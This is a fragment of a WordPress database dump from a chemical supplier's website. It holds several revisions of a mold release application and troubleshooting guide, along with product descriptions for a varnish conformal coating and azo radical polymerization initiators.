effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="text-decoration: underline; color: #808080;"><span> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:34:44', '2016-10-24 14:34:44', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2728, 3, '2016-10-24 14:36:10', '2016-10-24 14:36:10', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:36:10', '2016-10-24 14:36:10', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2729, 3, '2016-10-24 14:38:23', '2016-10-24 14:38:23', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 14:38:23', '2016-10-24 14:38:23', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2730, 107, '2016-10-24 14:45:12', '2016-10-24 14:45:12', '', '', '', 'publish', 'closed', 'closed', '', '2730', '', '', '2016-10-24 14:45:12', '2016-10-24 14:45:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/2730/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2731, 0, '2016-10-24 15:03:55', '2016-10-24 15:03:55', '', '', '', 'publish', 'closed', 'closed', '', '2731', '', '', '2016-10-24 15:03:55', '2016-10-24 15:03:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/2731/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2732, 3, '2016-10-24 17:03:02', '2016-10-24 17:03:02', 'MS-452N Varnish Conformal Coating is a special protective coating designed for adverse environmental conditions and offers excellent moisture, oil, chemical, and fungal resistance with good flexibility.  Miller-Stephenson\'s Varnish coating has excellent electrical insulation and moisture/fungus resistant properties making it ideal for use on stators, transformers, field coils, printed circuits, completed electric assemblies, junction boxes and cables.\n\nVarnish Conformal Coatings are hard, moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability. These products are usually made of lower molecular weight polymers which affect the performance properties and quality of the product.', 'MS-452N', 'MS-452N Protective Varnish is designed for adverse environmental conditions and offers excellent moisture, oil, chemical, and fungal resistance with good flexibility.  Miller-Stephenson&#039;s Varnish coating has excellent electrical insulation and moisture/fungus resistant properties making it ideal for use on stators, transformers, field coils, printed circuits, completed electric assemblies, junction boxes and cables.', 'inherit', 'closed', 'closed', '', '622-autosave-v1', '', '', '2016-10-24 17:03:02', '2016-10-24 17:03:02', '', 622, 'https://www.miller-stephenson.com/622-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2733, 0, '2016-10-24 17:15:18', '2016-10-24 17:15:18', '', '', '', 'publish', 'closed', 'closed', '', '2733', '', '', '2016-10-24 17:15:18', '2016-10-24 17:15:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/2733/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2734, 3, '2016-10-24 17:17:36', '2016-10-24 17:17:36', 'Vazo FRS is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as free radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas. Vazo free radical initiators are cost-effective, efficient polymerization initiators and radical halogenation agents.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. VazoFRS compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the compounds,<a href="https://www.miller-stephenson.com/product/vazo-64-radical-initiator/"> Vazo 64</a> (AIBN) has a 10hr half-life at 64 degrees Celsius, while <a href="https://www.miller-stephenson.com/product/vazo-88-radical-initiator/">Vazo 88</a> has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated each FRS analogue indicates its 10hr half-life at that temperature.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, FRS initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.\r\n\r\nTo learn more about Radical Polymerization please go to: <a 